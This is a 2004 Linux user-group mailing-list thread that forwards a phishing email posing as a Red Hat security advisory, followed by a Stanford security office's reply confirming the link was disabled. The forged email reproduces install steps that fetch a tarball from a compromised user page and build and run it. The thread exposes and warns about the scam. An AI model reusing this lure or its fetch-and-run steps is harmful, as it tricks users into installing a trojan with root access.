[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"
Rick Moen
rick at linuxmafia.com
Sat Oct 23 19:22:28 IST 2004
----- Forwarded message from Information Security Services <security-nr at stanford.edu> -----
From: Information Security Services <security-nr at stanford.edu>
To: Rick Moen <rick at linuxmafia.com>, inbox <security-nr at stanford.edu>
Date: Sat, 23 Oct 2004 11:16:14 -0700
X-Mailer: Microsoft Outlook Express 6.00.2800.1409
Subject: SU#2005-00212 - Re: Trojaned fileutils for Red Hat / Fedora being distributed from a user account
X-Spam-Status: No, hits=-4.4 required=5.0 tests=BAYES_00,HTML_MESSAGE,
HTML_TITLE_UNTITLED autolearn=no version=2.63
Thank you for alerting us to this situation.
We have disabled the link from our afs space and alerted the user to the account compromise.
Thanks again!
CJ
Carolyn Jane Hafner
Information Security Office, Internal Audit
Polya Hall, Room 119
255 Panama St.
Stanford, CA 94305-4136
(650) 996-7812
(650) 723-2911
security at stanford.edu
dmca-claim at stanford.edu
cjhafner at stanford.edu
----- Original Message -----
From: Rick Moen
To: security at stanford.edu
Sent: Saturday, October 23, 2004 8:54 AM
Subject: Trojaned fileutils for Red Hat / Fedora being distributed from a user account
Please note the involvement of http://www.stanford.edu/~joeio/ in this
attempt to distribute a trojan. Contents of the tarball in that
directory appear to be Bourne shell compiled in an effort to obscure it.
Sadly, I'm sure there are people stupid enough to fall for this.
----- Forwarded message from Marek <m.mcgann at sussex.ac.uk> -----
From: Marek <m.mcgann at sussex.ac.uk>
Organization: Centre for Research in the Cognitive Sciences (COGS)
Date: Sat, 23 Oct 2004 12:35:44 +0100
To: ilug at linux.ie
Subject: [ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"
Thought you might be interested to see the below - it's the first time I've
seen anything like this for Linux (apologies for the html mail, but that's
how it arrived).
I presume it's this Joeio in Stanford (or whoever) trying to spam his way into
Red Hat boxes?
Interesting to see someone considering desktop "not-terribly-clued-in" Linux
users a worthwhile target.
Or am I being too suspicious about it?
---------- Forwarded Message ----------
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
Date: Saturday 23 October 2004 05:37
From: RedHat Security Team <security at redhat.com>
To: <another mailing list I'm subscribed to>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {font-size: 12px}
-->
</style>
</head>
<body>
<p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png" ></p>
<p> Original issue date: October 20, 2004<br>
Last revised: October 20, 2004<br>
Source: RedHat </p>
<p>A complete revision history is at the end of this file. </p>
<p>Dear RedHat user,</p>
<p> Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges. Some
of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
*BSD and Solaris platforms are NOT affected.</p> <p>The RedHat Security Team
strongly advises you to immediately apply the<strong> fileutils-1.0.6
patch</strong>. This is a critical-critical update that you must make by
following these steps:</p> <ul>
<li>First download the patch from the Stanford RedHat mirror:
<strong><em>wget
www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
<li>Untar the patch:<em><strong> tar zxvf
fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
fileutils-1.0.6.patch</strong></em></li>
<li><em><strong>make</strong></em></li>
<li><em><strong>./inst</strong></em></li>
</ul>
<p>Again, please apply this patch as soon as possible or you risk your system
and others` to be compromised.</p> <p>Thank you for your prompt attention to
this serious matter,</p>
<p>RedHat Security Team.</p>
<p class="style1"> Copyright © 2004 Red Hat, Inc. All rights reserved.
</p> </body>
</html>
-------------------------------------------------------
--
Irish Linux Users' Group
http://www.linux.ie/mailman/listinfo/ilug/
----- End forwarded message -----
----- End forwarded message -----